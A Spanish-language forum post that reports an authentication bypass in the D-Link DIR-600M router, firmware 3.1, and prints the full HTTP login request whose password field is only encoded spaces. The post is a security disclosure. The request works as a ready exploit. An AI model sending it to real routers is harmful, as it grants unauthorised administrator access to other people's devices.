El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 21-05-2017 15:50:28

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,896

D-Link DIR600M: Entrar como root poniendo espacios en la contraseña

Brecha critica en los D-Link DIR600M

  El D-Link DIR600M es un router que es compatible con el modo "repetidor WiFi"
Es un router b/g/n MIMO 1T1R (una antena, hasta 150Mbps) que tiene un punto a su favor:
  Lleva una antena externa de 5dBi y la antena es desmontable.

DIR600M_1.jpg

A pesar de no ser de ultima generación es un modelo interesante: Se puede emplear como repetidor y se puede equipar con una antena de alta ganancia. 
D-Link lo sigue produciendo y soportando.
  Desgraciadamente tiene un grave fallo a la hora de comprobar la validez de las contraseñas entradas por los usuarios cuando intentan acceder a la interfaz de configuración.
  El fallo afecta la cuenta de administrador: ¡Peligro máximo!   
  Si por desgracia el acceso remoto está habilitado se puede estar seguro de que el router ya forma parte un botnet barato...
  Para saltarse los credenciales de un DIR-600M debemos entrar veinte (o más) espacios como contraseña para "root".
¡Le damos a <Enter> y listo!
Demostración:

  La petición maligna tiene esta pinta:

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send

La brecha ha sido comprobada en la versión 3.1 del firmware de este dispositivo.
No podemos descartar que más dispositivos "D-Link DIR" estén afectados.
Créditos brecha y fuente

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
2 971 14-08-2019 22:00:55 por kcdtv
0 111 14-08-2019 17:04:34 por kcdtv
Pegado:
Pegado:: Hostbase 1.2 está aqui por Koala  [ 1 2 3 7 ]
160 15309 13-08-2019 18:52:48 por Flashed
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 14 ]
330 24461 13-08-2019 09:22:14 por kcdtv
Pegado:
Pegado:: 3º Sorteo Del Mercadillo!! por josep345  [ 1 2 ]
41 1389 10-08-2019 18:19:23 por josep345

Pie de página

Información del usuario

Ultimo usuario registrado: itachi
Usuarios registrados conectados: 0
Invitados conectados: 14

Estadisticas de los foros

Número total de usuarios registrados: 1,577
Número total de temas: 1,341
Número total de mensajes: 13,570

Máx. usuarios conectados: 255 el 30-07-2019 10:48:17